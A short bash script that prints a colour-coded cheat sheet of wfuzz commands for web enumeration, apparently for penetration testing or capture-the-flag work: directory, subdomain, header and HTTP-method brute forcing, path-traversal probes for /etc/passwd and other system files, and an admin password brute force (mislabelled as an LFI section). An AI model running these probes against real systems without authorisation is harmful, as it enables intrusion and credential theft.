#!/bin/bash

# display common wfuzz commands for web enumeration

Frame='\033[0;32m'   # Green
Link='\033[0;35m'  	 # Purple
Title='\033[1;33m' 	 # Bold Yellow
Comment='\033[0;36m' # Cyan
End='\033[0m'		 # No Color
Point='\033[0;31m[*]\033[0m'

echo -e "${Frame}###${End} ${Title}Wordlist${End} ${Frame}###${End}"
echo -e "${Link}https://github.com/danielmiessler/SecLists.git${End}"
echo -e "Location: /usr/share/SecLists"
echo -e ""


echo -e "${Frame}###${End} ${Title}Directory Enumeration${End} ${Frame}###${End}"
echo -e "${Point} wfuzz -c -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --hc 404 \$URL/FUZZ"
echo -e ""


echo -e "${Frame}###${End} ${Title}Sub-Domain Enumeration${End} ${Frame}###${End}"
echo -e "${Point} wfuzz -c -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -H \"Host: FUZZ.\$HOST\" -u http://\$HOST -t 100"
echo -e ""


echo -e "${Frame}###${End} ${Title}User-Agent Bruteforce${End} ${Frame}###${End}"
echo -e "${Point} wfuzz -c -w /usr/share/SecLists/Fuzzing/User-Agents/UserAgents.fuzz.txt -H \"User-Agent: FUZZ\" $URL"
echo -e ""


echo -e "${Frame}###${End} ${Title}HTTP Methods Bruteforce${End} ${Frame}###${End}"
echo -e "${Point} wfuzz -c -w /usr/share/wfuzz/wordlist/general/http_methods.txt -X FUZZ \$URL"
echo -e ""


echo -e "${Frame}###${End} ${Title}LFI Parameter Bruteforce${End} ${Frame}###${End}"
echo -e "${Point} wfuzz -c -w /usr/share/SecLists/Discovery/Web-Content/burp-parameter-names.txt --hc 404 \$URL?FUZZ=../../../../../../etc/passwd"
echo -e ""


echo -e "${Frame}###${End} ${Title}LFI files Bruteforce${End} ${Frame}###${End}"
echo -e "${Point} wfuzz -c -w /usr/share/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hh 0 \$URL../../../../../../../FUZZ ${Comment}# linux${End}"
echo -e "${Point} wfuzz -c -w /usr/share/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt --hh 0 \$URL../../../../../../../FUZZ ${Comment}# windows${End}"
echo -e ""


echo -e "${Frame}###${End} ${Title}LFI Parameter Bruteforce${End} ${Frame}###${End}"
echo -e "${Point} wfuzz -u \$URL -d \"username=admin&password=FUZZ\" -w $wordlist --hh \$hide_size -c"
echo -e ""
